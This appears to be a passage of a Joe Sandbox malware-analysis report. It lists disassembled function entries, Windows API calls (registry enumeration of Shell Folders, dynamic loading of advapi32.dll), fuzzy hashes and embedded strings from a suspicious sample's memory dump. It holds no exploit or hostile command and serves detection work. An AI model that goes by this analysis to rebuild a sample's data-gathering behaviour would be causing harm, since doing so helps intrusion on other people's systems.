                                                                                                                                                              • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                              • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                              • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                              • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                              • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                              • memset.MSVCRT ref: 00405ABB
                                                                                                                                                              • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                              • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$FocusItemmemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4281309102-0
                                                                                                                                                              • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                                                                              • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                              • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                                                                              • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _snwprintfwcscat
                                                                                                                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                              • API String ID: 384018552-4153097237
                                                                                                                                                              • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                                                                              • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                              • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                                                                              • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                              • String ID: 0$6
                                                                                                                                                              • API String ID: 2029023288-3849865405
                                                                                                                                                              • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                                                                              • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                              • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                                                                              • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                              • memset.MSVCRT ref: 00405455
                                                                                                                                                              • memset.MSVCRT ref: 0040546C
                                                                                                                                                              • memset.MSVCRT ref: 00405483
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$memcpy$ErrorLast
                                                                                                                                                              • String ID: 6$\
                                                                                                                                                              • API String ID: 404372293-1284684873
                                                                                                                                                              • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                                                                              • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                              • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                                                                              • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                              APIs
                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                              • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                              • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                              • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                              • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                              • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1331804452-0
                                                                                                                                                              • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                                                                              • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                              • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                                                                              • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                              • String ID: advapi32.dll
                                                                                                                                                              • API String ID: 2012295524-4050573280
                                                                                                                                                              • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                                              • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                              • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                                              • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                              • <%s>, xrefs: 004100A6
                                                                                                                                                              • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$_snwprintf
                                                                                                                                                              • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                              • API String ID: 3473751417-2880344631
                                                                                                                                                              • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                                                              • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                              • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                                                              • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wcscat$_snwprintfmemset
                                                                                                                                                              • String ID: %2.2X
                                                                                                                                                              • API String ID: 2521778956-791839006
                                                                                                                                                              • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                                                              • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                              • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                                                              • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _snwprintfwcscpy
                                                                                                                                                              • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                              • API String ID: 999028693-502967061
                                                                                                                                                              • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                                                              • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                              • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                                                              • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                              APIs
                                                                                                                                                              • strlen.MSVCRT ref: 00408DFA
                                                                                                                                                                • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                                                              • memset.MSVCRT ref: 00408E46
                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                                                              • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$memsetstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2350177629-0
                                                                                                                                                              • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                                                              • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                              • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                                                              • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset
                                                                                                                                                              • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                              • API String ID: 2221118986-1606337402
                                                                                                                                                              • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                                                                              • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                              • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                                                                              • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                              APIs
                                                                                                                                                              • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                                                              • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                                                                              • memset.MSVCRT ref: 00408FD4
                                                                                                                                                              • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                                                                              • memset.MSVCRT ref: 00409042
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                                                                • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 265355444-0
                                                                                                                                                              • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                                                                              • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                              • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                                                                              • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                              • memset.MSVCRT ref: 0040C439
                                                                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                              • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                              • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4131475296-0
                                                                                                                                                              • Opcode ID: fcedaf62f28e4fa43429b70223f92c2d9bddde4a2c2a0188f501f40e4b32f332
                                                                                                                                                              • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                              • Opcode Fuzzy Hash: fcedaf62f28e4fa43429b70223f92c2d9bddde4a2c2a0188f501f40e4b32f332
                                                                                                                                                              • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004116FF
                                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                              • API String ID: 2618321458-3614832568
                                                                                                                                                              • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                                                                              • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                              • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                                                                              • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
